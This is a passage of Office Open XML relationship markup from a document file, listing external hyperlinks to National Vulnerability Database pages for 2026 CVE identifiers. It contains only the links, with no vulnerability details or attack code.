TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71553" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74881" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75132" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76223" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80380" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82864" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84192" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85390" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85654" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85787" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87803" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88026" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88027" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88028" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34789" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58230" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 